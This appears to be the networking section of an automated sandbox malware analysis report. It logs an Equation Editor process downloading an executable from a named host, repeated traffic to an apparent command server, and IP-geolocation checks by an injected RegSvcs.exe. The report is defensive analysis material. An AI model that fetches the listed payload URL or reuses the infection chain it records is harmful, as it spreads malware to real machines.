                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443

                  Networking

                  barindex
                  Source: Yara matchFile source: 9.2.RegSvcs.exe.820ee8.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.RegSvcs.exe.344d370.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.RegSvcs.exe.6a503e.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.RegSvcs.exe.3416458.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.RegSvcs.exe.c30000.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.RegSvcs.exe.820000.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.RegSvcs.exe.6a5f26.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.RegSvcs.exe.3415570.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000C.00000002.887663991.0000000000C30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000009.00000002.887535540.0000000000820000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: global trafficHTTP traffic detected: GET /xml/81.181.54.104 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/81.181.54.104 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/81.181.54.104 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/81.181.54.104 HTTP/1.1Host: reallyfreegeoip.org
                  Source: Joe Sandbox ViewIP Address: 104.21.67.152 104.21.67.152
                  Source: Joe Sandbox ViewIP Address: 158.101.44.242 158.101.44.242
                  Source: Joe Sandbox ViewASN Name: NATIXISUS NATIXISUS
                  Source: Joe Sandbox ViewJA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
                  Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDNS query: name: checkip.dyndns.org
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDNS query: name: checkip.dyndns.org
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDNS query: name: checkip.dyndns.org
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDNS query: name: checkip.dyndns.org
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDNS query: name: checkip.dyndns.org
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDNS query: name: checkip.dyndns.org
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDNS query: name: checkip.dyndns.org
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDNS query: name: checkip.dyndns.org
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDNS query: name: checkip.dyndns.org
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDNS query: name: checkip.dyndns.org
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDNS query: name: checkip.dyndns.org
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDNS query: name: checkip.dyndns.org
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDNS query: name: checkip.dyndns.org
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDNS query: name: checkip.dyndns.org
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDNS query: name: checkip.dyndns.org
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDNS query: name: checkip.dyndns.org
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDNS query: name: checkip.dyndns.org
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDNS query: name: checkip.dyndns.org
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDNS query: name: checkip.dyndns.org
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDNS query: name: checkip.dyndns.org
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDNS query: name: checkip.dyndns.org
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDNS query: name: checkip.dyndns.org
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDNS query: name: checkip.dyndns.org
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDNS query: name: checkip.dyndns.org
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDNS query: name: checkip.dyndns.org
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDNS query: name: checkip.dyndns.org
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDNS query: name: checkip.dyndns.org
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDNS query: name: checkip.dyndns.org
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDNS query: name: checkip.dyndns.org
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDNS query: name: checkip.dyndns.org
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDNS query: name: checkip.dyndns.org
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDNS query: name: checkip.dyndns.org
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDNS query: name: checkip.dyndns.org
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDNS query: name: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET /T76434567000.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Connection: Keep-AliveHost: baitalasma.com
                  Source: global trafficHTTP traffic detected: GET /T76434567000.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: baitalasma.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: unknownHTTPS traffic detected: 172.67.177.134:443 -> 192.168.2.22:49166 version: TLS 1.0
                  Source: unknownHTTPS traffic detected: 104.21.67.152:443 -> 192.168.2.22:49169 version: TLS 1.0
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_035306AA URLDownloadToFileW,2_2_035306AA
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\T76434567000[1].htmJump to behavior
                  Source: global trafficHTTP traffic detected: GET /T76434567000.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Connection: Keep-AliveHost: baitalasma.com
                  Source: global trafficHTTP traffic detected: GET /xml/81.181.54.104 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/81.181.54.104 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/81.181.54.104 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/81.181.54.104 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /T76434567000.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: baitalasma.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: EQNEDT32.EXE, 00000002.00000002.526557448.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.460593789.00000000005BD000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526397052.00000000005C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
                  Source: global trafficDNS traffic detected: DNS query: baitalasma.com
                  Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                  Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
                  Source: EQNEDT32.EXE, 00000002.00000002.526524695.000000000053F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://baitalasma.com/T76434567000.exe
                  Source: EQNEDT32.EXE, 00000002.00000002.526615840.0000000003530000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://baitalasma.com/T76434567000.exej
                  Source: RegSvcs.exe, 00000009.00000002.887723750.0000000002436000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887712847.0000000002507000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.com
                  Source: RegSvcs.exe, 00000009.00000002.887723750.0000000002479000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.887723750.0000000002424000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.887723750.0000000002436000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.887723750.00000000024C5000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887712847.0000000002507000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887712847.000000000259A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887712847.00000000024FB000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887712847.000000000254A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
                  Source: RegSvcs.exe, 00000009.00000002.887544334.0000000000922000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.887723750.000000000239A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.887544334.0000000000938000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887524692.00000000005E7000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.888289461.0000000005A58000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887712847.0000000002462000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                  Source: RegSvcs.exe, 00000009.00000002.887535540.0000000000820000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887588429.0000000000665000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887663991.0000000000C30000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.888025081.0000000003411000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
                  Source: EQNEDT32.EXE, 00000002.00000002.526557448.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.460593789.00000000005BD000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526397052.00000000005C4000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526433998.00000000005C7000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.888283169.0000000005B20000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.888289461.0000000005A40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
                  Source: EQNEDT32.EXE, 00000002.00000002.526557448.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.460593789.00000000005BD000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526397052.00000000005C4000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526433998.00000000005C7000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.887544334.0000000000938000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887524692.000000000062A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
                  Source: EQNEDT32.EXE, 00000002.00000002.526557448.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.460593789.00000000005BD000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526397052.00000000005C4000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526433998.00000000005C7000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.887544334.0000000000938000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887524692.000000000062A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
                  Source: EQNEDT32.EXE, 00000002.00000002.526557448.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.460593789.00000000005BD000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526397052.00000000005C4000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526433998.00000000005C7000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.887544334.0000000000938000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887524692.000000000062A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
                  Source: EQNEDT32.EXE, 00000002.00000002.526557448.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.460593789.00000000005BD000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526397052.00000000005C4000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526433998.00000000005C7000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.888283169.0000000005B20000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.888289461.0000000005A40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                  Source: EQNEDT32.EXE, 00000002.00000002.526557448.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.460593789.00000000005BD000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526397052.00000000005C4000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526433998.00000000005C7000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.887544334.0000000000938000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887524692.000000000062A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
                  Source: EQNEDT32.EXE, 00000002.00000002.526557448.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.460593789.00000000005BD000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526397052.00000000005C4000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526433998.00000000005C7000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.887544334.0000000000938000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887524692.000000000062A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
                  Source: EQNEDT32.EXE, 00000002.00000002.526557448.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.460593789.00000000005BD000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526397052.00000000005C4000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526433998.00000000005C7000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.887544334.0000000000938000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887524692.000000000062A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                  Source: EQNEDT32.EXE, 00000002.00000002.526557448.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.460593789.00000000005BD000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526397052.00000000005C4000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526433998.00000000005C7000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.887544334.0000000000938000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887524692.000000000062A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
